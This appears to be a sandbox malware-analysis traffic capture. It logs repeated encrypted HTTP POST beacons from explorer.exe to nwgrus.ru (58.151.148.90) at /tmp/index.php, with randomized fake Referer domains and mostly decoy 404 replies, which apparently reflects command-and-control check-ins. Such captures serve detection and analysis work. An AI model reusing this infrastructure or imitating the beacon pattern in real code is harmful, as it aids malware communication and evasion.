                                                                      Oct 3, 2024 12:27:42.739104986 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:42 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.44974458.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:42.748956919 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://pqllteniaumhpux.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 159
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:42.748956919 CEST159OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 2c 42 f0 89
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu,BLGpY\?l&c_cy/:U,_:Jp}Q
                                                                      Oct 3, 2024 12:27:44.296719074 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:43 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.44974558.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:44.307208061 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ksbeipjuadnqvhne.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 344
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:44.307208061 CEST344OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 54 26 c9 ab
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuT&0sf&^l^2qt<edzM(eP7=ibH!_X~.wT%yWD^wSd3KfiA?2G/
                                                                      Oct 3, 2024 12:27:45.899676085 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:45 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.44974658.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:45.911700964 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ikkkpskbtojtajm.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 209
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:45.911731958 CEST209OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 31 58 cf f6
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu1X*~Nr\6?UREmGHP:Yak8Jp@Z@B%5d5=KrWQx-__,}
                                                                      Oct 3, 2024 12:27:47.406816006 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:47 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.44974758.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:47.415420055 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://tlcaywkjpltapmg.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 118
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:47.415435076 CEST118OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 41 53 ad 95
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuAS*NYvDw0uP[
                                                                      Oct 3, 2024 12:27:49.220580101 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:48 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.44974858.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:49.229250908 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ljdtqpdqnfgadl.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 112
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:49.229268074 CEST112OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 77 06 d4 ad
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwRxPg|2<EmX
                                                                      Oct 3, 2024 12:27:51.563879967 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:51 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.44974958.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:51.572967052 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://fmsbxuxqcel.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 116
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:51.572989941 CEST116OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 7e 5e b7 99
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu~^r^gbl1kU+Z7q+
                                                                      Oct 3, 2024 12:27:54.543570042 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:53 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.44975058.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:54.554745913 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://sjpwecfehtwlg.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 145
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:54.554778099 CEST145OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 34 02 a0 a7
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu4bs#^qsGG9i|h#]WcV%T#
                                                                      Oct 3, 2024 12:27:56.427618027 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                      Oct 3, 2024 12:27:56.711549044 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.44975258.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:56.716701984 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vvymdudugxqyqgd.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 171
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:56.716741085 CEST171OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 73 1e fd 99
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vusc^bcnYjF3uqL_+Ja\7N/_S3<,DU&j
                                                                      Oct 3, 2024 12:27:58.367597103 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.44975358.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:58.384233952 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vctlwttuihixctye.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 269
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:58.384268999 CEST269OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5e 0a df ee
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu^uXWN`"$z/*@^tB<;{z.,(</xwXO+"wcK3ZwOusC=4G8bg{)
                                                                      Oct 3, 2024 12:28:00.313723087 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:59 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
